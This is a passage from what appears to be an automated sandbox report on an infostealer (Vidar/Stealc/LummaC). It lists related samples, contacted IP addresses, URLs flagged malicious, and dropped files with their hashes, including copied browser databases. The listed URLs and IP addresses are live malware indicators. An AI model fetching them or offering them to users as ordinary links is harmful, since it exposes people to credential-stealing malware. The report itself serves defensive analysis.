	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3 172.67.162.108 172.67.132.32 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	http://google.com	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.162.108 172.67.132.32 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	https://finalstepgo.com/uploads/il2.txt	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.162.108 172.67.132.32 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH	Get hash	malicious	Unknown	Browse	188.114.97.3 172.67.162.108 172.67.132.32 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	0.dll	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	188.114.97.3 172.67.162.108 172.67.132.32 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	DropboxInstaller.exe	Get hash	malicious	Unknown	Browse	188.114.97.3 172.67.162.108 172.67.132.32 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	DropboxInstaller.exe	Get hash	malicious	Unknown	Browse	188.114.97.3 172.67.162.108 172.67.132.32 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	188.114.97.3 172.67.162.108 172.67.132.32 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
	file.exe	Get hash	malicious	SmokeLoader	Browse	188.114.97.3 172.67.162.108 172.67.132.32 188.114.96.3 104.102.49.254 104.21.2.13 172.67.208.139
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254 172.105.54.160
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254 172.105.54.160
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254 172.105.54.160
	file.exe	Get hash	malicious	Unknown	Browse	104.102.49.254 172.105.54.160
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.102.49.254 172.105.54.160
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.102.49.254 172.105.54.160
	Payment copy.vbs	Get hash	malicious	FormBook, GuLoader	Browse	104.102.49.254 172.105.54.160
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	104.102.49.254 172.105.54.160
	PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbe	Get hash	malicious	GuLoader, Lokibot	Browse	104.102.49.254 172.105.54.160
	PersonalizedOffer.exe	Get hash	malicious	UltraVNC	Browse	104.102.49.254 172.105.54.160

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\FBFHJJJDAF.exe	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
C:\ProgramData\FIEHIIIJDA.exe	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\DHIECGCAEBFI\AFHDBG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHIECGCAEBFI\ECFHIJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHIECGCAEBFI\KJDGDB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FBFHJJJDAF.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.988110023083548
Encrypted:	false
SSDEEP:	6144:CQuuGQX/FN5CVU03+wwybsDV3Sdmq2r5tmsz2ViLEO:vui9N5iQ5p3Sd0TmsTEO
MD5:	16F5B27C9E1376C17B03BF8C5090DB3C
SHA1:	676145AB7CA93E0463B931E6A056804B8F42119E
SHA-256:	7952E7769A991C349CC092B9CB3D1505405E793B526F49C784C343DD7D3CD227
SHA-512:	23FE6E23E80257469C09BA68B2C78EE6B3C03700E8173EFF4E2CA94964AD3AB8F2B0CB20DD01E483BF6B7D8DE1138BC946CEBBA6BEC10D78E7CCEC6DC0C3CB5E
Malicious:	true
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................M.b.K..K.9~h.w....G).2..X..u.........&...W...`.r..I.z-@..W....y...x..e...g.O....f.&..~.vV.\...yM<..V&..z..B.).....y..-....g.*E..!T9.z...M..."...A...#..V..kj#.2....)........:r...-9\..hK<....f3u.xX....T.....+Q:.......T....X.i.v7.....Q.9vq. .M.r0..}k.t5J!..1.e..U..;....;..z.9_Y.T3?k%..L.6M....;.P.5W.'0....V.T,9wl..y....]....sj:y..k.4.$.".o.9.V+.@Re3Y..(...:.K.O#..L..X%.u..`&.1&..X{.

C:\ProgramData\FIEHIIIJDA.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.988867781346718
Encrypted:	false
SSDEEP:	6144:O+0dGgr04h1LBuTmcYz43wUDPNvms5PYYzX3oYbEU6DsV4+1/QSyiZEO:30d/h1LBK13wUjx5QYTo0EUBVSS/EO
MD5:	2CCE29D734EA1D227B338834698E2DE4
SHA1:	41700CD1BCF5F5BCCA81CE722ED47FC17BD030C2
SHA-256:	F75ACF936390F89239C43552717EFB65C4C3190B16A7EEC62DCD0053A045E91D
SHA-512:	EA0B440113A225764B38AE2526A10F7E4F3081E4A353E9831CF0E846AC7BA97EA7C2B4A12AB6FAC5708A7855DA8967F1B6BC661757DC68D819D11887A6AF20B5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0............................................................R....^.G.Y..60...7~...r..f.b.xg]..s.j.{0..M....6.....{..[..@U....Nq!...+.. ....J.......2....5....QL".l....V......M@........_....)K...P.../p.wg..........7:?.C..f ....Sc...... x.n];.w1..e.$:z.d.>!.t..q....Vg.3c.h.hlWt..5...br...H.XD6...uW11v9I.\|...xJnLx......w>..>s...^.'.s2J....Y......U......-.E#).:....~...2]8...SU..f8zd.i..ns>..fx...:.U..&B....`.g...Z.L.#........03z..>..^...t.K.Y.[q

C:\ProgramData\IIDHJDGCGDAA\AKEGII

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\IIDHJDGCGDAA\AKJDGI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIDHJDGCGDAA\CBFIJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIDHJDGCGDAA\DGCAAA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIDHJDGCGDAA\EGIDHD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIDHJDGCGDAA\GHIJJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIDHJDGCGDAA\GHJDBA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIDHJDGCGDAA\HIDGCF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIDHJDGCGDAA\IJDHCB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIDHJDGCGDAA\JDGCFB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIDHJDGCGDAA\JDGCFB-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIDHJDGCGDAA\KKKJKE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIDHJDGCGDAA\KKKJKE-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

